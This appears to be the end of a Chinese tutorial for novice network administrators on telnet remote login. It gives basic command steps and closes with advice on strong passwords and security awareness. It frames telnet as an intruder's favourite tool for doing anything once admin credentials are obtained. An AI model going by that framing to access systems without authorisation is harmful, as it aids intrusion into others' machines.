功能強大的遠程登陸命令，幾乎所有的入侵者都喜歡用它，屢試不爽。為什麼？它操作簡單，如同使用自己的機器一樣，只要你熟悉DOS命令，在成功以 administrator身份連接了遠程機器後，就可以用它來干你想乾的一切了。下面介紹一下使用方法，首先鍵入telnet回車，再鍵入help查看其幫助信息。
然後在提示符下鍵入open IP回車，這時就出現了登陸窗口，讓你輸入合法的用戶名和密碼，這里輸入任何密碼都是不顯示的。
當輸入用戶名和密碼都正確後就成功建立了telnet連接，這時候你就在遠程主機上具有了和此用戶一樣的許可權，利用DOS命令就可以實現你想乾的事情了。這里我使用的超級管理員許可權登陸的。
到這里為止，網路DOS命令的介紹就告一段落了，這里介紹的目的只是給菜鳥網管一個印象，讓其知道熟悉和掌握網路DOS命令的重要性。其實和網路有關的DOS命令還遠不止這些，這里只是拋磚引玉，希望能對廣大菜鳥網管有所幫助。學好DOS對當好網管有很大的幫助，特別的熟練掌握了一些網路的DOS命令。
另外大家應該清楚，任何人要想進入系統，必須得有一個合法的用戶名和密碼（輸入法漏洞差不多絕跡了吧），哪怕你拿到帳戶的只有一個很小的許可權，你也可以利用它來達到最後的目的。所以堅決消滅空口令，給自己的帳戶加上一個強壯的密碼，是最好的防禦弱口令入侵的方法。
最後，由衷的說一句，培養良好的安全意識才是最重要的。